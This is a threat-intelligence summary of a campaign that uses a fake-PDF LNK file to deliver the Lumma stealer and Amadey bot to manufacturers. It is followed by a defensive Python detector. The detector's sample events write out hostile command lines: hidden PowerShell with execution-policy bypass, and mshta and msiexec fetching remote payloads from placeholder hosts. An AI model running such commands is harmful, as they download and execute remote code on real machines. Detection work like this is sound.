Summary:
A recent cyberattack campaign targeting the manufacturing sector has been identified, utilizing a malicious LNK file disguised as a PDF. The attackers leverage various Living-off-the-Land Binaries and sophisticated evasion techniques to deploy the Lumma stealer and Amadey bot, aiming to exfiltrate sensitive information. #ManufacturingSecurity #MaliciousLNK #CyberThreats
Key points:
Cyble Research and Intelligence Labs (CRIL) discovered a malicious campaign targeting the manufacturing industry.
The attack uses a deceptive LNK file disguised as a PDF to initiate infection.
Multiple Living-off-the-Land Binaries (LOLBins) are employed to bypass security mechanisms.
Google Accelerated Mobile Pages (AMP) URLs are utilized to evade detection.
File injection techniques are heavily relied upon to execute malicious payloads in memory.
The attack chain includes DLL sideloading and the use of IDATLoader to deploy Lumma stealer and Amadey bot.
The initial infection vector is suspected to be a spear-phishing email.
Malicious PowerShell commands are executed to fetch and run additional payloads from remote servers.
The campaign demonstrates increasing sophistication in cyberattack methodologies.
MITRE Techniques:
Phishing (T1566): The LNK file may be delivered through phishing or spam emails.
User Execution: Malicious Link (T1204.001): Execution begins when a user executes the LNK file.
Command and Scripting Interpreter: PowerShell (T1059.001): The LNK file executes PowerShell commands.
Masquerading: Masquerade File Type (T1036.008): Uses LNK files with altered icons to make them look like legitimate documents (here, a PDF).
System Binary Proxy Execution: Mshta (T1218.005): Abuses mshta.exe to proxy execution of malicious files.
Obfuscated Files or Information (T1027): Scripts include packed or encrypted data.
System Binary Proxy Execution: Msiexec (T1218.007): msiexec.exe used for proxy execution of malicious payloads.
DLL Side-Loading (T1574.002): A malicious DLL is sideloaded by a legitimate executable.
Process Injection (T1055): Injects malicious content into explorer.exe and other processes.
Scheduled Task/Job (T1053.005): Adds task scheduler entry for persistence.
Application Layer Protocol (T1071): Malware communicates to the C&C server.
Automated Exfiltration (T1020): Data is exfiltrated after collection.
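As an added illustration (not code from the report or from CRIL), the following Python detector scores constructed process-creation events for the LOLBin chain listed above: PowerShell launched with hidden/bypass flags, mshta.exe or msiexec.exe fetching a remote URL, a Google AMP redirector in the command line, and a proxy binary running underneath powershell.exe. The sample events, pids and URLs are constructed placeholders, not the campaign's indicators.

```python
import re

# Constructed sample process-creation events (not telemetry from the report).
SAMPLE_EVENTS = [
    {"pid": 10, "ppid": 1,  "image": "explorer.exe",   "cmd": "explorer.exe"},
    {"pid": 11, "ppid": 10, "image": "powershell.exe",
     "cmd": 'powershell.exe -w hidden -ep bypass -c "mshta https://www.google.ca/amp/s/example.invalid/x"'},
    {"pid": 12, "ppid": 11, "image": "mshta.exe",
     "cmd": "mshta.exe https://www.google.ca/amp/s/example.invalid/x"},
    {"pid": 13, "ppid": 12, "image": "msiexec.exe",
     "cmd": "msiexec.exe /q /i https://example.invalid/p.msi"},
    {"pid": 20, "ppid": 1,  "image": "powershell.exe", "cmd": "powershell.exe Get-ChildItem C:\\"},
]

URL_RE = re.compile(r"https?://\S+", re.I)
AMP_RE = re.compile(r"google\.[a-z.]+/amp/s/", re.I)        # AMP redirector used as a lure
PROXY_BINS = {"mshta.exe", "msiexec.exe"}                      # T1218.005 / T1218.007
HIDDEN_PS = re.compile(r"-(w(indowstyle)?\s+hidden|e(p|xecutionpolicy)\s+bypass)", re.I)

def ancestors(ev, by_pid):
    """Yield the parent chain (nearest first); stops at pids not in the event set."""
    p = by_pid.get(ev["ppid"])
    while p is not None:
        yield p
        p = by_pid.get(p["ppid"])

def score_events(events):
    """Return {pid: (score, [reasons])} for every event that matches at least one rule."""
    by_pid = {e["pid"]: e for e in events}
    hits = {}
    for ev in events:
        reasons, img, cmd = [], ev["image"].lower(), ev["cmd"]
        if img == "powershell.exe" and HIDDEN_PS.search(cmd):
            reasons.append("powershell hidden window / execution-policy bypass (T1059.001)")
        if img in PROXY_BINS and URL_RE.search(cmd):
            reasons.append(f"{img} fetching remote content (T1218)")
        if AMP_RE.search(cmd):
            reasons.append("Google AMP redirector in command line")
        if img in PROXY_BINS and any(a["image"].lower() == "powershell.exe" for a in ancestors(ev, by_pid)):
            reasons.append("proxy binary spawned under powershell.exe (LOLBin chain)")
        if reasons:
            hits[ev["pid"]] = (len(reasons), reasons)
    return hits

if __name__ == "__main__":
    for pid, (score, why) in score_events(SAMPLE_EVENTS).items():
        print(pid, score, "; ".join(why))
```

The benign pid 20 PowerShell run scores nothing, while the mshta.exe child of the hidden PowerShell scores highest because three independent rules agree.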
IoC:
Full Research: https://cyble.com/blog/threat-actor-targets-manufacturing-industry-with-malware/